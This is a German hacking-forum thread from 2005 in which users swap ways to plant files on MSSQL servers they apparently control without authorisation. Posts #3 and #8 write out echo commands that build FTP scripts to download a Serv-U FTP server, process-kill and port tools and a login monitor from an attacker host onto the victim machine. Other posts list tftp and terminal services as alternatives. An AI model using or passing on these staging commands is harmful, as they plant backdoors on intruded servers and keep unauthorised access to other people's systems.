Keine FTP-Verbindung auf Server

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von martin05, 25. August 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 25. August 2005
    ich hab die suchfunktion und googel genutzt und ein paar versch. methoden gefunden um auf nem mssql daten per ftp (echo) zu übertragen.
    bisher hat mir immer folgender befehl geholfen und funktionierte:
    heute hab ich ein paar server bei denen kommt:
    und bei anderen:
    Ich hab auch schon folgendes probiert:
    Bitte den Thread nicht gleich schließen - ihr könnt mir auch per PN helfen, wenn ihr hier nix schreiben wollt. :]
    Serverdaten etc. unkenntlich gemacht - geht ja keinem was an! :rolleyes:
     

  2. Anzeige
  3. #2 26. August 2005
    erstmal danke, dass mir zum obigen problem überhaupt keiner hilft! :O

    habe jetzt probiert das alles per rcp-befehl zu machen aber ich bekomm dann nur ne beschreibung:
    hab zwar den befehl dann so geschrieben aber es geht nicht:
    wasn daran falsch? ?(

    per:
    klappt es auch nicht! ;(
     
  4. #3 26. August 2005
    also wenn du schon nen stro hast, auf dem du zugriff hast, würd ichs so machen:

    was ich bei mssql eingebe:

    mkdir pfad

    echo open ip port >> c:\winnt\sysinfo.txt

    echo user username passwort >> c:\winnt\sysinfo.txt

    echo get servu.exe pfad\servu.exe >> c:\winnt\sysinfo.txt

    echo get servu.ini pfad\servu.ini >> c:\winnt\sysinfo.txt

    echo get kill.exe pfad\kill.exe >> c:\winnt\sysinfo.txt

    echo get fport.exe pfadfport.exe >> c:\winnt\sysinfo.txt

    echo get on.txt pfad\on.txt >> c:\winnt\sysinfo.txt

    echo Bye >> c:\winnt\sysinfo.txt

    ^^ fet gedrucktes edit
    ich hab noch n paar andere proggis, die ich mit drinnehab, die hochgeschoben werden sollen

    bei der servu.ini musst du beachten, dass der port den du wählst auh verfügbar ist. teilweise bist du gezwungen ein programm zu killen und dann die servu über den port laufen zu lassen (darum kill.exe und fport.exe) in on.txt ist so n login monitor, den du bei deiner servu einstellen kannst.

    bei manchen bekomm ich auch diesen not connected fehler, musste einfach später oder mit ner anderen methode oder den nächsten machen

    so hoffe konnte dir helfen
     
  5. #4 26. August 2005
    ja schon klar, hab ja geschrieben dass ich mehrere methoden probiert habe.;)
    und für was pskill.exe und fport.exe da sind ist mir auch glasklar. :)

    mich würds nur mal interessieren ob es generell für versch. Fehlermeldungen wie oben geschrieben einen weg gibt dateien zu übertragen? ?(
    es gibt da die versch. fehlermeldungen eine davon ist eben:
    ich schau mir das nachher nochmal an und probiere es exakt nach deiner beschriebenen methode.

    nun interessiert mich dennoch wie ich das per rcp machen könnte. :)

    edit:
    nach deiner methode gegangen dann kommt:
    also funktioniert auch nicht. ;(
     
  6. #5 26. August 2005
    sql kenn ich nur die methoden:
    echo
    tftp
    ntpass
    terminal service

    ^^ von daher kann ich dir bei deiner rcp nicht weiter helfen sry
     
  7. #6 26. August 2005
    dann erklär mir mal bitte die anderen methoden. :]
    kanst auch gerne per pn, wenn du es hier nicht posten willst. 8)
    deine ftp-methode ging hier ja nicht (siehe oben). :(

    ps: ftp.exe, tftp.exe und rcp.exe hab ich auf dem server gefunden - muss also irgendwie gehen.;)
     
  8. #7 26. August 2005
    ich könnte mich natürlich hinsetzen und tuts dazu schreben, von denen es dann halt anstatt 39292857902, 39292857903 gibt

    ^^ wenn du verstehst worauf ich hinnaus will, diese methoden sind sehr bekannt und von daher wirst du dich bei der suche nicht sonderlich schwer tun. wenns dennoch so ist, muss ich mal wieder ran.
     
  9. #8 26. August 2005
    Hi,

    teste mal:

    [HIDE]echo open xx.xxx.xxx.xxx>>c:\bla.txt
    echo user anonymous ftp@ftp.com>>c:\bla.txt
    echo binary>>c:\bla.txt
    echo get xxxxx.exe>>c:\bla.txt
    echo get xxxxx.tmp>>c:\bla.txt
    echo quit>>c:\bla.txt[/HIDE]

    Gruß

    Sokrates
     
  10. #9 26. August 2005
    anonymous kann schon mal garnicht gehn, da meine files nicht auf nen pub sind! :rolleyes:

    hab meine dateien jetzt mal auf nen pub geschoben und mit deiner methode getestet dann kommt aber:
     
  11. #10 11. September 2005
    Also ich bin jetzt mal wieder auf nem anderen Server und mein Standard-Vorgehen funktioniert mal wieder nicht. :O

    Rausfinden konnte ich folgendes:
     
  12. #11 11. September 2005
    "-b", ned "- b"
     
  13. #12 11. September 2005
    sorry, war mein fehler, hab natürlich "-b" eingegeben. :]
    klappt aber trotzdem nicht. :(
    zudem "neues" problem beim nächsten server (siehe 1. seite ganz unten). ;(
     
  14. #13 11. September 2005
    ich geb dir nen tipp: nimm freespace. wenn das problem dann immer noch auftritt, vergiss den server, sofern du nix anderes als echo kannst :)
     
  15. #14 11. September 2005
    ich hab meine files auf funpic liegen. :rolleyes:
    habs aber auch mit pub's probiert!
    tja, wenn nix anderes bei mir geht (rcp) ..... aber deshalb will ich den server nicht vergessen, hab ja öfters mal solche! :O
    kannst mir auch andere methoden sagen und mir ja ne anleitung dazu geben. =)
     

  16. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Keine FTP Verbindung
  1. [XP] Keine Verbindung zu Microsoft FTP !!

    jsp , 12. Januar 2009 , im Forum: Windows
    Antworten:
    3
    Aufrufe:
    496
  2. Antworten:
    4
    Aufrufe:
    234
  3. Antworten:
    4
    Aufrufe:
    837
  4. Antworten:
    3
    Aufrufe:
    243
  5. Antworten:
    20
    Aufrufe:
    925